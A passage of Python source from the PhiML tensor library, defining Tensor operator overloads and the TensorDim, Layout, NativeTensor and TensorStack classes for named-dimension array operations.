'Tensor':\n order = self.shape._order_group(dims)\n if self.shape.is_uniform:\n native = self.native(order)\n if pos is None:\n pos = min(self.shape.indices(dims))\n new_shape = self.shape.without(dims)._expand(packed_dim.with_sizes([self.shape.only(dims).volume]), pos)\n native = choose_backend(native).reshape(native, new_shape.sizes)\n return NativeTensor(native, new_shape)\n else:\n from ._ops import concat_tensor\n from ._magic_ops import pack_dims\n value = cached(self)\n assert isinstance(value, TensorStack)\n assert value._stack_dim.name in dims\n inner_packed = [pack_dims(t, dims, packed_dim) for t in value._tensors]\n return concat_tensor(inner_packed, packed_dim.name)\n\n def __cast__(self, dtype: DType):\n return self._op1(lambda native: choose_backend(native).cast(native, dtype=dtype))\n\n def dimension(self, name: Union[str, Shape]) -> 'TensorDim':\n \"\"\"\n Returns a reference to a specific dimension of this tensor.\n This is equivalent to the syntax `tensor.`.\n\n The dimension need not be part of the `Tensor.shape` in which case its size is 1.\n\n Args:\n name: dimension name\n\n Returns:\n `TensorDim` corresponding to a dimension of this tensor\n \"\"\"\n if isinstance(name, str):\n return TensorDim(self, name)\n elif isinstance(name, Shape):\n return TensorDim(self, name.name)\n else:\n raise ValueError(name)\n\n def pack(self, dims, packed_dim):\n \"\"\" See `pack_dims()` \"\"\"\n from ._ops import 
pack_dims\n return pack_dims(self, dims, packed_dim)\n\n def unpack(self, dim, unpacked_dims):\n \"\"\" See `unpack_dim()` \"\"\"\n from ._ops import unpack_dim\n return unpack_dim(self, dim, unpacked_dims)\n\n def __getattr__(self, name):\n if name.startswith('__'): # called by hasattr in magic ops\n raise AttributeError\n if name.startswith('_'):\n raise AttributeError(f\"'{type(self)}' object has no attribute '{name}'\")\n if name == 'is_tensor_like': # TensorFlow replaces abs() while tracing and checks for this attribute\n raise AttributeError(f\"'{type(self)}' object has no attribute '{name}'\")\n assert name not in ('shape', '_shape', 'tensor'), name\n return TensorDim(self, name)\n\n def __add__(self, other):\n return self._op2(other, lambda x, y: x + y, lambda x, y: choose_backend(x, y).add(x, y), 'add', '+')\n\n def __radd__(self, other):\n return self._op2(other, lambda x, y: y + x, lambda x, y: choose_backend(x, y).add(y, x), 'radd', '+')\n\n def __sub__(self, other):\n return self._op2(other, lambda x, y: x - y, lambda x, y: choose_backend(x, y).sub(x, y), 'sub', '-')\n\n def __rsub__(self, other):\n return self._op2(other, lambda x, y: y - x, lambda x, y: choose_backend(x, y).sub(y, x), 'rsub', '-')\n\n def __and__(self, other):\n return self._op2(other, lambda x, y: x & y, lambda x, y: choose_backend(x, y).and_(x, y), 'and', '&')\n\n def __rand__(self, other):\n return self._op2(other, lambda x, y: y & x, lambda x, y: choose_backend(x, y).and_(y, x), 'rand', '&')\n\n def __or__(self, other):\n return self._op2(other, lambda x, y: x | y, lambda x, y: choose_backend(x, y).or_(x, y), 'or', '|')\n\n def __ror__(self, other):\n return self._op2(other, lambda x, y: y | x, lambda x, y: choose_backend(x, y).or_(y, x), 'ror', '|')\n\n def __xor__(self, other):\n return self._op2(other, lambda x, y: x ^ y, lambda x, y: choose_backend(x, y).xor(x, y), 'xor', '^')\n\n def __rxor__(self, other):\n return self._op2(other, lambda x, y: y ^ x, lambda x, y: choose_backend(x, y).xor(y, x), 'rxor', '^')\n\n def __mul__(self, other):\n return self._op2(other, lambda x, y: x * y, lambda x, y: choose_backend(x, y).mul(x, y), 'mul', '*')\n\n def __rmul__(self, other):\n return self._op2(other, lambda x, y: y * x, lambda x, y: choose_backend(x, y).mul(y, x), 'rmul', '*')\n\n def __truediv__(self, other):\n return self._op2(other, lambda x, y: x / y, lambda x, y: choose_backend(x, y).div(x, y), 'truediv', '/')\n\n def __rtruediv__(self, other):\n return self._op2(other, lambda x, y: y / x, lambda x, y: choose_backend(x, y).div(y, x), 'rtruediv', '/')\n\n def __divmod__(self, other):\n return self._op2(other, lambda x, y: divmod(x, y), lambda x, y: divmod(x, y), 'divmod', 'divmod')\n\n def __rdivmod__(self, other):\n return self._op2(other, lambda x, y: divmod(y, x), lambda x, y: divmod(y, x), 'rdivmod', 'divmod')\n\n def __floordiv__(self, other):\n return self._op2(other, lambda x, y: x // y, lambda x, y: choose_backend(x, y).floordiv(x, y), 'floordiv', '//')\n\n def __rfloordiv__(self, other):\n return self._op2(other, lambda x, y: y // x, lambda x, y: choose_backend(x, y).floordiv(y, x), 'rfloordiv', '//')\n\n def __pow__(self, power, modulo=None):\n assert modulo is None\n return self._op2(power, lambda x, y: x ** y, lambda x, y: choose_backend(x, y).pow(x, y), 'pow', '**')\n\n def __rpow__(self, other):\n return self._op2(other, lambda x, y: y ** x, lambda x, y: choose_backend(x, y).pow(y, x), 'rpow', '**')\n\n def __mod__(self, other):\n return self._op2(other, lambda x, y: x % y, lambda x, y: 
choose_backend(x, y).mod(x, y), 'mod', '%')\n\n def __rmod__(self, other):\n return self._op2(other, lambda x, y: y % x, lambda x, y: choose_backend(x, y).mod(y, x), 'rmod', '%')\n\n def __eq__(self, other):\n if _EQUALITY_REDUCE[-1] == 'ref':\n return wrap(self is other)\n elif _EQUALITY_REDUCE[-1] == 'shape_and_value':\n if set(self.shape) != set(other.shape):\n return wrap(False)\n from ._ops import close\n return wrap(close(self, other, rel_tolerance=0, abs_tolerance=0))\n if other is None:\n other = float('nan')\n return self._op2(other, lambda x, y: x == y, lambda x, y: choose_backend(x, y).equal(x, y), 'eq', '==')\n\n def __ne__(self, other):\n if _EQUALITY_REDUCE[-1] == 'ref':\n return wrap(self is not other)\n elif _EQUALITY_REDUCE[-1] == 'shape_and_value':\n if set(self.shape) != set(other.shape):\n return wrap(True)\n from ._ops import close\n return wrap(not close(self, other, rel_tolerance=0, abs_tolerance=0))\n if other is None:\n other = float('nan')\n return self._op2(other, lambda x, y: x != y, lambda x, y: choose_backend(x, y).not_equal(x, y), 'ne', '!=')\n\n def __lt__(self, other):\n return self._op2(other, lambda x, y: x < y, lambda x, y: choose_backend(x, y).greater_than(y, x), 'lt', '<')\n\n def __le__(self, other):\n return self._op2(other, lambda x, y: x <= y, lambda x, y: choose_backend(x, y).greater_or_equal(y, x), 'le', '<=')\n\n def __gt__(self, other):\n return self._op2(other, lambda x, y: x > y, lambda x, y: choose_backend(x, y).greater_than(x, y), 'gt', '>')\n\n def __ge__(self, other):\n return self._op2(other, lambda x, y: x >= y, lambda x, y: choose_backend(x, y).greater_or_equal(x, y), 'ge', '>=')\n\n def __lshift__(self, other):\n return self._op2(other, lambda x, y: x << y, lambda x, y: choose_backend(x, y).shift_bits_left(x, y), 'lshift', '<<')\n\n def __rlshift__(self, other):\n return self._op2(other, lambda y, x: x << y, lambda y, x: choose_backend(x, y).shift_bits_left(x, y), 'lshift', '<<')\n\n def __rshift__(self, other):\n return self._op2(other, lambda x, y: x >> y, lambda x, y: choose_backend(x, y).shift_bits_right(x, y), 'rshift', '>>')\n\n def __rrshift__(self, other):\n return self._op2(other, lambda y, x: x >> y, lambda y, x: choose_backend(x, y).shift_bits_right(x, y), 'rshift', '>>')\n\n def __abs__(self):\n return self._op1(lambda t: choose_backend(t).abs(t))\n\n def __round__(self, n=None):\n return self._op1(lambda t: choose_backend(t).round(t))\n\n def __copy__(self):\n return self._op1(lambda t: choose_backend(t).copy(t, only_mutable=True))\n\n def __deepcopy__(self, memodict={}):\n return self._op1(lambda t: choose_backend(t).copy(t, only_mutable=False))\n\n def __neg__(self) -> 'Tensor':\n return self._op1(lambda t: -t)\n\n def __invert__(self) -> 'Tensor':\n return self._op1(lambda t: choose_backend(t).invert(t))\n\n def __reversed__(self):\n assert self.shape.channel.rank == 1\n return self[::-1]\n\n def __iter__(self):\n if self.rank == 1:\n return iter(self.native())\n elif self.rank == 0:\n return iter([self.native()])\n else:\n from ._ops import reshaped_native\n native = reshaped_native(self, [self.shape])\n return iter(native)\n\n def __matmul__(self, other):\n assert isinstance(other, Tensor), f\"Matmul '@' requires two Tensor arguments but got {type(other)}\"\n match_names = self.shape.dual.as_batch().names\n if not match_names: # this is not a matrix\n assert self.shape.primal.only(other.shape).is_empty, f\"Cannot compute matmul {self.shape} @ {other.shape}. 
First argument is not a matrix; it has no dual dimensions.\"\n return self * other\n match_primal = other.shape.only(match_names, reorder=True)\n if not match_primal:\n assert non_batch(other).non_dual.rank == 1, f\"Cannot multiply {self.shape} @ {other.shape} because arg2 does not have appropriate non-dual dimensions\"\n match_primal = non_batch(other).non_dual\n match_dual = self.shape.dual.only(match_primal.as_dual(), reorder=True)\n left_arg = pack_dims(self, match_dual, dual('_reduce'))\n right_arg = pack_dims(other, match_primal, channel('_reduce'))\n from ._ops import dot\n return dot(left_arg, '~_reduce', right_arg, '_reduce')\n\n # def __rmatmul__(self, other):\n\n 
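# Example (illustrative sketch, not part of the original file): if m has a dual dim '~cols' and v has a matching primal dim 'cols', then m @ v packs both into '_reduce' dims and contracts them via dot(), like a matrix-vector product.\n\n 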
def _tensor(self, other) -> 'Tensor':\n if isinstance(other, Tensor):\n return other\n elif isinstance(other, (tuple, list)) and any(isinstance(v, Tensor) for v in other):\n if 'vector' in self.shape:\n outer_dim = self.shape['vector']\n elif self.shape.channel_rank == 1:\n outer_dim = self.shape.channel\n else:\n raise ValueError(f\"Cannot combine tensor of shape {self.shape} with tuple {tuple([type(v).__name__ for v in other])}\")\n remaining_shape = self.shape.without(outer_dim)\n other_items = [v if isinstance(v, Tensor) else compatible_tensor(v, compat_shape=remaining_shape, compat_natives=self._natives(), convert=False) for v in other]\n other_stacked = stack(other_items, outer_dim, expand_values=True)\n return other_stacked\n else:\n return compatible_tensor(other, compat_shape=self.shape, compat_natives=self._natives(), convert=False)\n\n def _op1(self, native_function) -> 'Tensor':\n \"\"\"\n Transform the values of this tensor given a function that can be applied to any native tensor.\n\n Args:\n native_function: Function mapping a native tensor to another native tensor.\n\n Returns:\n `Tensor` with transformed values.\n \"\"\"\n raise NotImplementedError(self.__class__)\n\n def _op2(self, other, operator: Callable, native_function: Callable, op_name: str = 'unknown', op_symbol: str = '?') -> 'Tensor':\n \"\"\"\n Apply a broadcast operation on two tensors.\n\n Args:\n other: second argument\n operator: function (Tensor, Tensor) -> Tensor, used to propagate the operation to children tensors to have Python choose the callee\n native_function: function (native tensor, native tensor) -> native tensor\n op_name: Name of the python function without leading and trailing `__`.\n Examples: 'add', 'radd', 'sub', 'mul', 'and', 'eq', 'ge'.\n op_symbol: Operation symbol, such as '+', '-', '&', '%', '>='\n\n Returns:\n `Tensor`\n \"\"\"\n raise NotImplementedError(self.__class__)\n\n def _natives(self) -> tuple:\n raise NotImplementedError(self.__class__)\n\n def _spec_dict(self) -> dict:\n raise NotImplementedError(self.__class__)\n\n @classmethod\n def _from_spec_and_natives(cls, spec: dict, natives: list):\n raise NotImplementedError(cls)\n\n def _expand(self):\n \"\"\" Expands all compressed tensors to their defined size as if they were being used in `Tensor.native()`. \"\"\"\n warnings.warn(\"Tensor._expand() is deprecated, use cached(Tensor) instead.\", DeprecationWarning)\n raise NotImplementedError(self.__class__)\n\n def _simplify(self):\n \"\"\" Does not cache this value but if it is already cached, returns the cached version. \"\"\"\n return self\n\n\nTensorOrTree = TypeVar('TensorOrTree', Tensor, PhiTreeNode, numbers.Number, bool, tuple, list, dict)\n\n\n
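# Example (illustrative sketch, not part of the original file): tensor.x is shorthand for TensorDim(tensor, 'x'); tensor.x[0] slices the tensor along 'x' and tensor.x.size reads the dimension size.\n\n\n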
class TensorDim(BoundDim):\n \"\"\"\n Reference to a specific dimension of a `Tensor`.\n\n To obtain a `TensorDim`, use `Tensor.dimension()` or the syntax `tensor.<name>`.\n\n Indexing a `TensorDim` as `tdim[start:stop:step]` returns a sliced `Tensor`.\n\n See the documentation at https://tum-pbs.github.io/PhiML/Math.html#indexing-slicing-unstacking .\n \"\"\"\n\n def __init__(self, tensor: Tensor, name: str):\n super().__init__(tensor, name)\n self.tensor = tensor\n\n def __len__(self):\n warnings.warn(\"Use Tensor.dim.size instead of len(Tensor.dim). len() only supports integer sizes.\", DeprecationWarning)\n return self.size\n\n def as_batch(self, name: str = None):\n \"\"\" Returns a shallow copy of the `Tensor` where the type of this dimension is *batch*. \"\"\"\n return self._as(BATCH_DIM, name)\n\n def as_spatial(self, name: str = None):\n \"\"\" Returns a shallow copy of the `Tensor` where the type of this dimension is *spatial*. \"\"\"\n return self._as(SPATIAL_DIM, name)\n\n def as_channel(self, name: str = None):\n \"\"\" Returns a shallow copy of the `Tensor` where the type of this dimension is *channel*. \"\"\"\n return self._as(CHANNEL_DIM, name)\n\n def as_instance(self, name: str = None):\n \"\"\" Returns a shallow copy of the `Tensor` where the type of this dimension is *instance*. \"\"\"\n return self._as(INSTANCE_DIM, name)\n\n def as_type(self, dim_type: Union[Callable, str]):\n return self._as(dim_type('d').type if callable(dim_type) else dim_type, None)\n\n def _as(self, dim_type: str, name: Union[str, None]):\n if not self.exists:\n return self.tensor\n shape = self.tensor.shape\n new_types = list(shape.types)\n new_types[shape.index(self.name)] = dim_type\n new_names = shape.names\n if name is not None:\n new_names = list(new_names)\n new_names[shape.index(self.name)] = name\n new_shape = Shape(shape.sizes, tuple(new_names), tuple(new_types), shape.item_names)\n return self.tensor._with_shape_replaced(new_shape)\n\n @property\n def index(self):\n return self.tensor.shape.index(self.name)\n\n def split(self, split_dimensions: Shape):\n \"\"\" See `phiml.math.unpack_dim()` \"\"\"\n warnings.warn(\"dim.split() is deprecated. Use math.unpack_dim() instead.\", stacklevel=2)\n from ._magic_ops import unpack_dim\n return unpack_dim(self.tensor, self.name, split_dimensions)\n\n def __matmul__(self, other):\n from ._ops import dot\n if isinstance(other, BoundDim):\n return dot(self.obj, (self.name,), other.obj, (other.name,))\n if isinstance(other, (tuple, list)):\n other = wrap(other, self.obj.shape[self.name])\n if isinstance(other, Tensor):\n assert self.name in other.shape, f\"Cannot reduce '{self.name}' of tensor with shape {self.obj.shape} against tensor with shape {other.shape}. Dimension must be present on both tensors.\"\n return dot(self.tensor, (self.name,), other, (self.name,))\n else:\n return NotImplemented\n\n __rmul__ = __mul__ = __rmatmul__ = __matmul__\n\n def sum(self):\n from ._ops import sum_\n return sum_(self.tensor, self.name)\n\n def prod(self):\n from ._ops import prod\n return prod(self.tensor, self.name)\n\n\n_EQUALITY_REDUCE = [None]\n\n\n@contextmanager\ndef equality_by_ref():\n \"\"\"\n Enables Tensor.__bool__: within this context, Tensor.__eq__ and Tensor.__ne__ compare tensors by reference, returning a single bool.\n \"\"\"\n _EQUALITY_REDUCE.append('ref')\n try:\n yield None\n finally:\n assert _EQUALITY_REDUCE.pop(-1) == 'ref'\n\n\n@contextmanager\ndef equality_by_shape_and_value():\n \"\"\"\n Enables Tensor.__bool__: within this context, Tensor.__eq__ and Tensor.__ne__ compare tensors by shape and value, returning a single bool.\n \"\"\"\n _EQUALITY_REDUCE.append('shape_and_value')\n try:\n yield None\n finally:\n assert _EQUALITY_REDUCE.pop(-1) == 'shape_and_value'\n\n\nclass Layout(Tensor):\n \"\"\"\n Tensor representation of a PyTree consisting of only lists, tuples and leaves.\n Leaves can be any Python object or primitive, including tuples and lists.\n The PyTree may be deeper but only the outer `shape.rank` levels are represented as a tensor.\n \"\"\"\n\n def __init__(self, obj, shape: Shape):\n self._obj = obj\n self._shape = shape\n\n @property\n def shape(self) -> Shape:\n return self._shape\n\n @property\n def dtype(self) -> DType:\n if isinstance(self._obj, bool):\n return DType(bool)\n if isinstance(self._obj, int):\n return DType(int, 64)\n elif isinstance(self._obj, (float, complex)):\n return DType(type(self._obj), precision=64)\n else:\n return DType(object)\n\n @property\n def default_backend(self):\n return None\n\n def native(self, order: Union[str, tuple, list, Shape] = None, singleton_for_const=False):\n order = parse_dim_order(order)\n assert order is None or order == self._shape.names, \"Layout.native() does not allow for changing the dimension order\"\n return self._obj\n\n def numpy(self, order: Union[str, tuple, list, Shape] = None) -> np.ndarray:\n native = self.native(order=order)\n return numpy.asarray(native)\n\n def _getitem(self, selection: dict) -> 'Tensor':\n selection_list = [selection.get(dim, None) for dim in self._shape.names]\n native = self._getitem_recursive(self._obj, tuple(selection_list))\n new_shape = self._shape.after_gather(selection)\n return Layout(native, new_shape)\n\n def __repr__(self):\n return repr(self._obj)\n\n def __format__(self, format_spec):\n if BROADCAST_FORMATTER.values is not None:\n return BROADCAST_FORMATTER.register_formatted(self, format_spec)\n return repr(self._obj)\n\n def _unstack(self, dimension: str):\n if dimension == self._shape.names[0]:\n native = tuple(self._obj.values()) if isinstance(self._obj, dict) else self._obj\n inner_shape = self._shape[1:]\n return tuple([Layout(n, inner_shape) for n in native])\n else:\n raise NotImplementedError()\n\n @staticmethod\n def _getitem_recursive(native, selection: tuple):\n if not selection:\n return native\n native = tuple(native.values()) if isinstance(native, dict) else native\n if len(selection) == 1:\n return native if selection[0] is None else native[selection[0]]\n else:\n if selection[0] is None:\n return type(native)([Layout._getitem_recursive(n, selection[1:]) for n in native])\n if isinstance(selection[0], int):\n return Layout._getitem_recursive(native[selection[0]], selection[1:])\n elif isinstance(selection[0], slice):\n subset = native[selection[0]]\n return type(subset)([Layout._getitem_recursive(n, selection[1:]) for n in subset])\n else:\n raise ValueError(f\"Illegal selection: {selection}\")\n\n def _as_list(self):\n 
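# Flatten the wrapped PyTree into a flat list of leaves, depth-first.\n 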
return self._as_list_recursive(self._obj, self._shape.rank, [])\n\n @staticmethod\n def _as_list_recursive(native, dims: int, result: list):\n if dims == 0:\n result.append(native)\n else:\n native = tuple(native.values()) if isinstance(native, dict) else native\n for n in native:\n Layout._as_list_recursive(n, dims - 1, result)\n return result\n\n @property\n def _is_tracer(self) -> bool:\n return False\n\n def __bool__(self):\n assert self.rank == 0, f\"Cannot convert tensor with non-empty shape {self.shape} to bool. Use tensor.any or tensor.all instead.\"\n return bool(self._obj)\n\n def __stack__(self, values: tuple, dim: Shape, **kwargs) -> 'Layout':\n obj = [v.native(self._shape) for v in values]\n new_shape = concat_shapes(dim, self._shape)\n return Layout(obj, new_shape)\n\n @staticmethod\n def __concat__(values: tuple, dim: str, **kwargs) -> 'Shapable':\n return NotImplemented\n\n def __flatten__(self, flat_dim: Shape, flatten_batch: bool):\n if not flatten_batch and self._shape.batch:\n raise NotImplementedError\n return layout(self._as_list(), flat_dim)\n\n def __expand__(self, dims: Shape, **kwargs) -> 'Tensor':\n new_dims = dims.without(self._shape)\n if not new_dims:\n return self\n obj = self._obj\n for dim in reversed(new_dims):\n assert isinstance(dim.size, int), \"Can only expand layouts by integer-sized dimensions\"\n obj = [obj] * dim.size\n return Layout(obj, concat_shapes(new_dims, self._shape))\n\n def __replace_dims__(self, dims: Tuple[str, ...], new_dims: Shape, **kwargs) -> 'Tensor':\n new_shape = self._shape.replace(dims, new_dims)\n return Layout(self._obj, new_shape)\n\n def __pack_dims__(self, dims: Tuple[str, ...], packed_dim: Shape, pos: Union[int, None], **kwargs) -> 'Layout':\n if dims == self.shape.names:\n native = self._as_list()\n return Layout(native, packed_dim.with_size(len(native)))\n else:\n obj = []\n for i in self._shape.only(dims, reorder=True).meshgrid():\n obj.append(self[i].native())\n return Layout(obj, concat_shapes(packed_dim.with_size(self.shape.only(dims).volume), self._shape.without(dims)))\n\n def __unpack_dim__(self, dim: str, unpacked_dims: Shape, **kwargs) -> 'Layout':\n return NotImplemented\n\n def __cast__(self, dtype: DType):\n obj = self._recursive_cast(self._obj, self._shape, dtype)\n return Layout(obj, self._shape)\n\n def __copy__(self):\n return Layout(self._obj, self._shape)\n\n def __iter__(self):\n if self.rank == 1:\n return iter(self._obj)\n elif self.rank == 0:\n return iter([self._obj])\n else:\n return iter(self._as_list())\n\n def __eq__(self, other):\n if _EQUALITY_REDUCE[-1]:\n return Tensor.__eq__(self, other)\n return self._op2(other, lambda x, y: x == y, lambda x, y: x == y, 'eq', '==')\n\n def __ne__(self, other):\n if _EQUALITY_REDUCE[-1]:\n return Tensor.__ne__(self, other)\n return self._op2(other, lambda x, y: x != y, lambda x, y: x != y, 'ne', '!=')\n \n def _assert_close(self, other: Tensor, rel_tolerance: float, abs_tolerance: float, msg: str, verbose: bool):\n from ._ops import assert_close\n inner_test = lambda x, y: assert_close(x, y, rel_tolerance=rel_tolerance, abs_tolerance=abs_tolerance, msg=msg, verbose=verbose)\n return self._op2(other, inner_test, inner_test, 'assert_close', '≈')\n\n def _op2(self, other, operator: Callable, native_function: Callable, op_name: str = 'unknown', op_symbol: str = '?') -> Tensor:\n obj = self._recursive_op2(self._obj, self._shape, other, operator, native_function, op_name)\n new_shape = concat_shapes(self._shape, other.shape.without(self._shape)) if 
isinstance(other, Tensor) else self._shape\n return Layout(obj, new_shape)\n\n @staticmethod\n def _recursive_op2(obj, shape: Shape, other, operator, native_function, op_name):\n if shape:\n dim = shape.names[0]\n if isinstance(other, Tensor) and dim in other.shape:\n assert other.shape.get_size(dim) == len(obj), f\"Shape mismatch during {op_name}: '{dim}' has size {len(obj)} on layout but {other.shape.get_size(dim)} on other tensor.\"\n others = [other[{dim: i}] for i in range(len(obj))]\n else:\n others = [other] * len(obj)\n if isinstance(obj, (tuple, list)):\n return type(obj)([Layout._recursive_op2(i, shape[1:], o, operator, native_function, op_name) for i, o in zip(obj, others)])\n elif isinstance(obj, dict):\n return {k: Layout._recursive_op2(v, shape[1:], o, operator, native_function, op_name) for (k, v), o in zip(obj.items(), others)}\n else: # leaf\n if isinstance(other, Layout) and not other.shape:\n return native_function(obj, other.native())\n if isinstance(other, Tensor):\n return operator(obj, other)\n else:\n return native_function(obj, other)\n\n def _op1(self, native_function):\n return Layout(self._recursive_op1(self._obj, self._shape, native_function), self._shape)\n\n @staticmethod\n def _recursive_op1(obj, shape: Shape, native_function):\n raise NotImplementedError\n # if shape:\n # if isinstance(obj, (tuple, list)):\n # return type(obj)([Layout._recursive_op1(i, shape[1:], native_function) for i in obj])\n # else:\n # return native_function(obj)\n\n @staticmethod\n def _recursive_cast(obj, shape: Shape, dtype: DType):\n if shape:\n if isinstance(obj, (tuple, list)):\n return type(obj)([Layout._recursive_cast(i, shape[1:], dtype) for i in obj])\n elif isinstance(obj, dict):\n return {k: Layout._recursive_cast(v, shape[1:], dtype) for k, v in obj.items()}\n elif isinstance(obj, Tensor):\n assert obj.shape == shape\n from ._ops import cast\n return cast(obj, dtype)\n else:\n raise ValueError(obj)\n else:\n return dtype.kind(obj)\n\n\n
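# Example (illustrative sketch, not part of the original file): l = layout([{'a': 1}, {'a': 2}], batch('b')) wraps the list without converting it; l.b[0].native() returns the original dict {'a': 1}.\n\n\n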
class NativeTensor(Tensor):\n \"\"\"\n Tensor backed by a (possibly lower-rank) backend-specific tensor.\n The dimension names and types corresponding to the native tensor are stored in _native_shape.\n The property _shape can contain additional dimensions along which the tensor is constant.\n \"\"\"\n\n def __init__(self, native_tensor, native_shape: Shape, expanded_shape: Shape = None):\n expanded_shape = native_shape if expanded_shape is None else expanded_shape\n if DEBUG_CHECKS:\n expanded_shape._check_is_valid_tensor_shape()\n backend = choose_backend(native_tensor)\n assert native_shape.is_uniform\n assert expanded_shape.is_uniform\n assert backend.staticshape(native_tensor) == native_shape.sizes, f\"Shape {native_shape} does not match native tensor with shape {backend.staticshape(native_tensor)}\"\n assert native_shape in expanded_shape\n self._native = native_tensor\n self._shape = expanded_shape\n self._native_shape = native_shape\n\n def native(self, order: Union[str, tuple, list, Shape] = None, singleton_for_const=False):\n order = parse_dim_order(order, check_rank=self.rank)\n order = self._shape.names if order is None else order\n assert isinstance(order, tuple) # should not be necessary\n assert all([n in order for n in self._native_shape.names]), f\"order must list all essential dimensions but got {order} for tensor {self.shape}\"\n backend = self.default_backend\n if order == self._native_shape.names:\n if self.dtype.precision in [None, get_precision()]:\n return self._native\n else:\n return backend.cast(self._native, DType(self.dtype.kind, precision=get_precision()))\n # --- Transpose ---\n perm = self._native_shape.only(order, reorder=False)._perm(self._native_shape.only(order, reorder=True).names)\n if perm != list(range(len(perm))):\n transposed = backend.transpose(self._native, perm) # this will cast automatically\n else:\n transposed = backend.as_tensor(self._native)\n if len(order) == len(perm):\n return transposed # nothing to expand\n # --- Expand ---\n slices = [slice(None) if dim in self._native_shape else None for dim in order]\n expanded = transposed[tuple(slices)]\n if not singleton_for_const:\n multiples = [self._shape.get_size(dim) if dim in self._shape and dim not in self._native_shape else 1 for dim in order]\n expanded = backend.tile(expanded, multiples)\n return expanded\n\n def _cache(self):\n if self._shape == self._native_shape:\n return\n self._native = self.native(order=self._shape)\n self._native_shape = self._shape\n\n def _cached(self, dims: Shape = None) -> 'NativeTensor':\n if dims is None or self._shape in (dims & self._native_shape):\n return NativeTensor(self.native(order=self._shape), self._shape, self._shape)\n else:\n new_native_shape = dims & self._native_shape\n tmp_tensor = NativeTensor(self._native, self._native_shape, new_native_shape)\n return NativeTensor(tmp_tensor.native(new_native_shape), new_native_shape, self._shape)\n\n @property\n def collapsed_dims(self):\n return self._shape.without(self._native_shape)\n\n @property\n def dtype(self):\n return choose_backend(self._native).dtype(self._native)\n\n @property\n def shape(self):\n return self._shape\n\n @property\n def default_backend(self) -> Backend:\n return choose_backend(self._native)\n\n def _with_shape_replaced(self, new_shape):\n if new_shape.rank != self._shape.rank:\n raise IncompatibleShapes(f\"Tensor {self} is not compatible with shape {new_shape}\", self._shape, new_shape)\n new_shape = Shape(self._shape.sizes, new_shape.names, new_shape.types, new_shape.item_names)\n native_indices = self._shape.indices(self._native_shape)\n new_native_shape = new_shape[native_indices]\n return NativeTensor(self._native, new_native_shape, new_shape)\n\n def _with_natives_replaced(self, natives: list):\n native = natives.pop(0)\n new_native_shape = self._native_shape.with_sizes(choose_backend(native).shape(native))\n new_shape = self._shape.with_sizes(new_native_shape)\n return NativeTensor(native, new_native_shape, new_shape)\n\n @property\n def _is_tracer(self) -> bool:\n return False\n\n def _to_dict(self):\n result = self.shape._to_dict(include_sizes=False)\n if self.rank == 0:\n result['data'] = self.numpy().item()\n else:\n result['data'] = self.numpy(self._shape).tolist() # works for all 1+ dimensional arrays\n return result\n\n def _getitem(self, selection: dict):\n if not selection:\n return self\n selections = [slice(None)] * self._native_shape.rank\n for name, sel in selection.items():\n if name in self._native_shape:\n selections[self._native_shape.index(name)] = sel\n elif name not in self._shape:\n assert isinstance(sel, int), f\"Attempting to slice missing dimension {name} with {selection}\"\n gathered = self.default_backend.multi_slice(self._native, tuple(selections)) if selections else self._native\n new_native_shape = self._native_shape.after_gather(selection)\n new_shape = self._shape.after_gather(selection)\n return NativeTensor(gathered, new_native_shape, new_shape)\n\n 
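# Unstacking along a collapsed (constant) dim repeats the same native tensor (see the else-branch below).\n 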
def _unstack(self, dim):\n new_shape = self._shape.without(dim)\n new_native_shape = self._native_shape.without(dim)\n if dim in self._native_shape:\n tensors = self.default_backend.unstack(self._native, axis=self._native_shape.index(dim))\n return tuple([NativeTensor(t, new_native_shape, new_shape) for t in tensors])\n else:\n assert dim in self._shape, f\"Cannot unstack tensor {self._shape} along non-existent dimension '{dim}'\"\n return (NativeTensor(self._native, new_native_shape, new_shape),) * self._shape.get_size(dim)\n\n def _op1(self, native_function):\n native = native_function(self._native)\n return NativeTensor(native, self._native_shape, self._shape) if native is not None else self\n\n def _op2(self, other, operator, native_function, op_name: str = 'unknown', op_symbol: str = '?', switch_args=False):\n try:\n other_tensor = self._tensor(other)\n was_converted = not isinstance(other, Tensor)\n except NoBackendFound:\n return NotImplemented\n if not isinstance(other_tensor, NativeTensor) and not was_converted:\n return NotImplemented\n if not isinstance(other_tensor, NativeTensor):\n other_tensor = NativeTensor(other_tensor.native(other_tensor.shape), other_tensor.shape, other_tensor.shape)\n broadcast_shape = self._native_shape & other_tensor._native_shape\n natives = [t.native(order=broadcast_shape, singleton_for_const=True) if t.rank > 0 else t.native() for t in [self, other_tensor]]\n if switch_args:\n natives = natives[::-1]\n result_tensor = native_function(*natives)\n return NativeTensor(result_tensor, broadcast_shape, self._shape & other_tensor._shape)\n\n def _natives(self) -> tuple:\n return self._native,\n\n def _spec_dict(self) -> dict:\n return {'type': NativeTensor, 'native_shape': self._native_shape, 'shape': self._shape}\n\n @classmethod\n def _from_spec_and_natives(cls, spec: dict, natives: list):\n return NativeTensor(natives.pop(0), spec['native_shape'], spec['shape'])\n\n def _expand(self):\n self._cache()\n\n\nclass TensorStack(Tensor):\n \"\"\"\n Implicit stack of multiple tensors.\n Stores a list of tensors and does not materialize the stacked tensor in memory.\n \"\"\"\n\n def __init__(self, components: Union[tuple, list], stack_dim: Shape):\n assert isinstance(stack_dim, Shape) and stack_dim.rank == 1, f\"stack_dim must be a single-dimension Shape object but got {type(stack_dim)}\"\n # assert len(components) > 1, \"Use a CollapsedTensor instead\"\n for t in components:\n assert isinstance(t, Tensor)\n assert stack_dim.name not in t.shape, f\"Cannot stack along '{stack_dim.name}' because the dimension already exists.\"\n self._tensors = tuple(components)\n self._stack_dim = stack_dim.with_sizes([len(components)], keep_item_names=True)\n try:\n merge_shapes(*self._tensors)\n self._varying_shapes = False\n except IncompatibleShapes:\n self._varying_shapes = True\n self._shape = shape_stack(self._stack_dim, *[t.shape for t in self._tensors])\n self._cached = None\n\n @property\n def _is_tracer(self) -> bool:\n return any([t._is_tracer for t in self._tensors])\n\n @property\n def requires_broadcast(self):\n return self._varying_shapes or not self._shape.well_defined or self._is_tracer or self._tensors[0].shape.is_non_uniform\n \n @property\n def stack_dim(self):\n warnings.warn(\"TensorStack.stack_dim is deprecated. 
